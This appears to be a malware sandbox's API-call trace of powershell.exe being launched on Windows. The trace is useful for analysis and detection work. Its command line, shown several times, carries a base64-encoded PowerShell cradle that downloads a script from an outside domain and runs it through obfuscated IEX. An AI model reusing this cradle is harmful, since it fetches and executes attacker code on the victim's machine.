	[0353.129] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.EXE", lpFindFileData=0x1c87dce0 | out: lpFindFileData=0x1c87dce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0353.130] SetErrorMode (uMode=0x1) returned 0x1
	[0353.130] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c87db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0353.130] SetErrorMode (uMode=0x1) returned 0x1
	[0353.130] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.BAT", lpFindFileData=0x1c87dce0 | out: lpFindFileData=0x1c87dce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0353.130] SetErrorMode (uMode=0x1) returned 0x1
	[0353.130] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c87db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0353.130] SetErrorMode (uMode=0x1) returned 0x1
	[0353.130] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.CMD", lpFindFileData=0x1c87dce0 | out: lpFindFileData=0x1c87dce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0353.131] SetErrorMode (uMode=0x1) returned 0x1
	[0353.131] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c87db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0353.131] SetErrorMode (uMode=0x1) returned 0x1
	[0353.131] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.VBS", lpFindFileData=0x1c87dce0 | out: lpFindFileData=0x1c87dce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0353.131] SetErrorMode (uMode=0x1) returned 0x1
	[0353.131] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c87db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0353.132] SetErrorMode (uMode=0x1) returned 0x1
	[0353.132] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.VBE", lpFindFileData=0x1c87dce0 | out: lpFindFileData=0x1c87dce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0353.132] SetErrorMode (uMode=0x1) returned 0x1
	[0353.132] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c87db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0353.132] SetErrorMode (uMode=0x1) returned 0x1
	[0353.132] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.JS", lpFindFileData=0x1c87dce0 | out: lpFindFileData=0x1c87dce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0353.132] SetErrorMode (uMode=0x1) returned 0x1
	[0353.133] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c87db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0353.133] SetErrorMode (uMode=0x1) returned 0x1
	[0353.133] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.JSE", lpFindFileData=0x1c87dce0 | out: lpFindFileData=0x1c87dce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0353.133] SetErrorMode (uMode=0x1) returned 0x1
	[0353.133] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c87db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0353.133] SetErrorMode (uMode=0x1) returned 0x1
	[0353.133] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.WSF", lpFindFileData=0x1c87dce0 | out: lpFindFileData=0x1c87dce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0353.134] SetErrorMode (uMode=0x1) returned 0x1
	[0353.134] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c87db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0353.134] SetErrorMode (uMode=0x1) returned 0x1
	[0353.134] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.WSH", lpFindFileData=0x1c87dce0 | out: lpFindFileData=0x1c87dce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0353.134] SetErrorMode (uMode=0x1) returned 0x1
	[0353.134] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c87db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0353.135] SetErrorMode (uMode=0x1) returned 0x1
	[0353.135] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.MSC", lpFindFileData=0x1c87dce0 | out: lpFindFileData=0x1c87dce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0353.135] SetErrorMode (uMode=0x1) returned 0x1
	[0353.135] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c87db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0353.135] SetErrorMode (uMode=0x1) returned 0x1
	[0353.135] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell", lpFindFileData=0x1c87dce0 | out: lpFindFileData=0x1c87dce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0353.135] SetErrorMode (uMode=0x1) returned 0x1
	[0353.136] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c87db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0353.136] SetErrorMode (uMode=0x1) returned 0x1
	[0353.136] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.ps1", lpFindFileData=0x1c87dce0 | out: lpFindFileData=0x1c87dce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0353.136] SetErrorMode (uMode=0x1) returned 0x1
	[0353.136] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c87db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0353.136] SetErrorMode (uMode=0x1) returned 0x1
	[0353.137] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.psm1", lpFindFileData=0x1c87dce0 | out: lpFindFileData=0x1c87dce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0353.137] SetErrorMode (uMode=0x1) returned 0x1
	[0353.137] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c87db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0353.137] SetErrorMode (uMode=0x1) returned 0x1
	[0353.137] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.psd1", lpFindFileData=0x1c87dce0 | out: lpFindFileData=0x1c87dce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0353.137] SetErrorMode (uMode=0x1) returned 0x1
	[0353.137] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c87db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0353.138] SetErrorMode (uMode=0x1) returned 0x1
	[0353.138] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.COM", lpFindFileData=0x1c87dce0 | out: lpFindFileData=0x1c87dce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0353.138] SetErrorMode (uMode=0x1) returned 0x1
	[0353.138] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c87db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0353.138] SetErrorMode (uMode=0x1) returned 0x1
	[0353.138] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.EXE", lpFindFileData=0x1c87dce0 | out: lpFindFileData=0x1c87dce0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="powershell.exe", cAlternateFileName="")) returned 0x48f350
	[0353.140] FindNextFileW (in: hFindFile=0x48f350, lpFindFileData=0x1c87dcf0 | out: lpFindFileData=0x1c87dcf0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="powershell.exe", cAlternateFileName="")) returned 0
	[0353.140] FindClose (in: hFindFile=0x48f350 | out: hFindFile=0x48f350) returned 1
	[0353.140] SetErrorMode (uMode=0x1) returned 0x1
	[0353.407] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x105, lpBuffer=0x1c87de00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpFilePart=0x0) returned 0x39
	[0353.407] SetErrorMode (uMode=0x1) returned 0x1
	[0353.407] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"), fInfoLevelId=0x0, lpFileInformation=0x1c87e010 | out: lpFileInformation=0x1c87e010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00)) returned 1
	[0353.407] SetErrorMode (uMode=0x1) returned 0x1
	[0353.408] CoTaskMemAlloc (cb=0x104) returned 0x4684b0
	[0353.408] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4684b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0353.408] CoTaskMemFree (pv=0x4684b0) 
	[0353.410] CoTaskMemAlloc (cb=0x104) returned 0x4684b0
	[0353.410] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4684b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0353.410] CoTaskMemFree (pv=0x4684b0) 
	[0353.413] CoTaskMemAlloc (cb=0x104) returned 0x4684b0
	[0353.413] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4684b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0353.413] CoTaskMemFree (pv=0x4684b0) 
	[0353.433] CoTaskMemAlloc (cb=0x104) returned 0x4684b0
	[0353.433] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4684b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0353.433] CoTaskMemFree (pv=0x4684b0) 
	[0353.459] CoTaskMemAlloc (cb=0x3b) returned 0x1b844270
	[0353.460] SHGetFileInfoA (in: pszPath="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", dwFileAttributes=0x0, psfi=0x1c87e1f8, cbFileInfo=0x168, uFlags=0x2000 | out: psfi=0x1c87e1f8) returned 0x4550
	[0353.461] CoTaskMemFree (pv=0x1b844270) 
	[0353.463] GetConsoleWindow () returned 0x10252
	[0353.657] CoTaskMemAlloc (cb=0x104) returned 0x4684b0
	[0353.657] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4684b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0353.657] CoTaskMemFree (pv=0x4684b0) 
	[0353.658] CoTaskMemAlloc (cb=0x104) returned 0x4684b0
	[0353.658] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4684b0, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0353.658] CoTaskMemFree (pv=0x4684b0) 
	[0353.664] CoTaskMemAlloc (cb=0x104) returned 0x4684b0
	[0353.664] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4684b0, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0353.664] CoTaskMemFree (pv=0x4684b0) 
	[0353.666] CommandLineToArgvW (in: lpCmdLine=" -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==", pNumArgs=0x1c87e240 | out: pNumArgs=0x1c87e240) returned 0x3fe510*=""
	[0353.667] lstrlenW (lpString="-EncodedCommand") returned 15
	[0353.668] CoTaskMemAlloc (cb=0x22) returned 0x1b84b2b0
	[0353.668] RtlMoveMemory (in: Destination=0x1b84b2b0, Source=0x3fe532, Length=0x20 | out: Destination=0x1b84b2b0) 
	[0353.668] CoTaskMemFree (pv=0x1b84b2b0) 
	[0353.668] lstrlenW (lpString="JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==") returned 376
	[0353.668] CoTaskMemAlloc (cb=0x2f4) returned 0x1b84d280
	[0353.668] RtlMoveMemory (in: Destination=0x1b84d280, Source=0x3fe552, Length=0x2f2 | out: Destination=0x1b84d280) 
	[0353.668] CoTaskMemFree (pv=0x1b84d280) 
	[0353.669] LocalFree (hMem=0x3fe510) returned 0x0
	[0353.670] CoTaskMemAlloc (cb=0x804) returned 0x1b84e4b0
	[0353.670] GetConsoleTitleW (in: lpConsoleTitle=0x1b84e4b0, nSize=0x400 | out: lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x48
	[0353.670] CoTaskMemFree (pv=0x1b84e4b0) 
	[0353.679] CoTaskMemAlloc (cb=0x38e) returned 0x3fe510
	[0353.679] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32", lpStartupInfo=0x1c87e1a0*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2fc2a58 | out: lpCommandLine="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==", lpProcessInformation=0x2fc2a58*(hProcess=0x358, hThread=0x354, dwProcessId=0x578, dwThreadId=0x630)) returned 1
	[0353.781] CoTaskMemFree (pv=0x3fe510) 
	[0353.782] CloseHandle (hObject=0x354) returned 1
	[0353.782] CoTaskMemAlloc (cb=0x3b) returned 0x1b844270
	[0353.782] SHGetFileInfoA (in: pszPath="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", dwFileAttributes=0x0, psfi=0x1c87e248, cbFileInfo=0x168, uFlags=0x2000 | out: psfi=0x1c87e248) returned 0x4550
	[0353.783] CoTaskMemFree (pv=0x1b844270) 
	[0353.786] GetCurrentProcess () returned 0xffffffffffffffff
	[0353.786] GetCurrentProcess () returned 0xffffffffffffffff
	[0353.787] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x358, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c87e328, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c87e328*=0x354) returned 1

Process:
	id = "20"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x1f51f000"
	os_pid = "0x85c"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 114
	os_tid = 0x978

	[0288.385] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0290.701] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0290.701] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0290.701] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0290.701] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0297.473] GetVersionExW (in: lpVersionInformation=0x26da40*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x26da40*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
